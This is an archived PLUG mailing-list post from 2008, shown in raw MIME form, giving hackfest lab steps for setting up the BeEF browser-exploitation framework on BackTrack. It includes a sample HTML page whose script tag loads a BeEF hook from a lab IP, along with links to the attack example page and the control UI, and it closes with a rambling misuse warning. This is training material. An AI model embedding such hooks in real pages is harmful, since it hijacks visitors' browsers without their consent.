No subject


Mon Sep 15 13:33:42 MST 2008


Left Corner KDE --> BackTrack -->SetUp BEef=20

Enter a Password
A shell terminal will open:
**************************************************************
BeEF Setup Complete!

The BeEF Interface can be found at:
  http://192.168.1.100/beef/ui/

Here is a simple HTML example:

<html>
<title>BeEF Example</title>
<body>BeEF<script src=3D'http://192.168.1.100/beef/hook/'></script>
</body>
</html>

An example of how BeEF can be used in an attack can be found at:
  http://192.168.1.100/beef/example.html

More information on BeEF can be found at:
  http://bindshell.net/tools/beef/
**************************************************************
Next:

Open your browser to your  "BEef" exploit page:
It will look like this URL:  http://192.168.1.69/beef/example.html

Open another window to your "BEef UI":
It will look like this URL:  http://192.168.1.69/beef/ui/#

Tutorials online show you how:
http://www.bindshell.net/tools/beef//tutorials/modules.html

WARNING: Misuse of any such exploit to gain clipboard information=2C exploi=
t persons=2C stalk=2C harrass or otherwise inflict carniverous torture on t=
hose who TRUSTED your code=2C CAN garner you attention from DHS=2C includin=
g but not limited to phone monitoring=2C Akamai information status=2C and w=
orse.  Further=2C coordinated information available from various telecommun=
ications and cable company databases related to complaints for use of such =
tools are resulting in consequences.

Also=2C the evil/good clowns that run the universe do not allow those who m=
isuse their abilities to keep them. =20

http://wapedia.mobi/en/Obnosis |  http://en.wiktionary.org/wiki/Citations:o=
bnosis | Obnosis.com (503)754-4452
Laugh at this MSN Footer


_________________________________________________________________
You live life beyond your PC. So now Windows goes beyond your PC.
http://clk.atdmt.com/MRT/go/115298556/direct/01/=

--_b536f79d-f0f0-4d8a-844a-4e733ae28296_
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<html>
<head>
<style>
.hmmessage P
{
margin:0px=3B
padding:0px
}
body.hmmessage
{
FONT-SIZE: 10pt=3B
FONT-FAMILY:Tahoma
}
</style>
</head>
<body class=3D'hmmessage'><div style=3D"text-align: left=3B">Where's the BE=
ef?<br>LAB 10 in PLUG HackFest Series<br>Instructions:<br><br>Boot into Bac=
kTrack KDE <br>From the Menu:<br><span style=3D"font-weight: bold=3B">Left =
Corner KDE --&gt=3B BackTrack --&gt=3BSetUp BEef </span><br><br>Enter a Pas=
sword<br><br style=3D"font-weight: bold=3B"><span style=3D"font-weight: bol=
d=3B">A shell terminal will open:</span><br>*******************************=
*******************************<br>BeEF Setup Complete!<br><br>The BeEF Int=
erface can be found at:<br>&nbsp=3B http://192.168.1.100/beef/ui/<br><br>He=
re is a simple HTML example:<br><br>&lt=3Bhtml&gt=3B<br>&lt=3Btitle&gt=3BBe=
EF Example&lt=3B/title&gt=3B<br>&lt=3Bbody&gt=3BBeEF&lt=3Bscript src=3D'htt=
p://192.168.1.100/beef/hook/'&gt=3B&lt=3B/script&gt=3B<br>&lt=3B/body&gt=3B=
<br>&lt=3B/html&gt=3B<br><br>An example of how BeEF can be used in an attac=
k can be found at:<br>&nbsp=3B http://192.168.1.100/beef/example.html<br><b=
r>More information on BeEF can be found at:<br>&nbsp=3B http://bindshell.ne=
t/tools/beef/<br>**********************************************************=
****<br><span style=3D"font-weight: bold=3B">Next:</span><br><br>Open your =
browser to your&nbsp=3B "BEef" exploit page:<br>It will look like this URL:=
&nbsp=3B <span style=3D"font-weight: bold=3B">http://192.168.1.69/beef/exam=
ple.html</span><br><br>Open another window to your "BEef UI":<br>It will lo=
ok like this URL:&nbsp=3B <span style=3D"font-weight: bold=3B">http://192.1=
68.1.69/beef/ui/#</span><br><br>Tutorials online show you how:<br><span sty=
le=3D"font-weight: bold=3B">http://www.bindshell.net/tools/beef//tutorials/=
modules.html</span><br></div><br>WARNING: Misuse of any such exploit to gai=
n clipboard information=2C exploit persons=2C stalk=2C harrass or otherwise=
 inflict carniverous torture on those who TRUSTED your code=2C CAN garner y=
ou attention from DHS=2C including but not limited to phone monitoring=2C A=
kamai information status=2C and worse.&nbsp=3B Further=2C coordinated infor=
mation available from various telecommunications and cable company database=
s related to complaints for use of such tools are resulting in consequences=
.<br><br><span style=3D"font-style: italic=3B">Also=2C the evil/good clowns=
 that run the universe do not allow those who misuse their abilities to kee=
p them.&nbsp=3B</span> <br><br>http://wapedia.mobi/en/Obnosis |&nbsp=3B htt=
p://en.wiktionary.org/wiki/Citations:obnosis | Obnosis.com (503)754-4452<br=
><hr style=3D"width: 100%=3B height: 2px=3B">Laugh at this MSN Footer<br><b=
r><br /><hr />You live life beyond your PC. So now Windows goes beyond your=
 PC. <a href=3D'http://clk.atdmt.com/MRT/go/115298556/direct/01/' target=3D=
'_new'>See how</a></body>
</html>=

--_b536f79d-f0f0-4d8a-844a-4e733ae28296_--


More information about the PLUG-discuss mailing list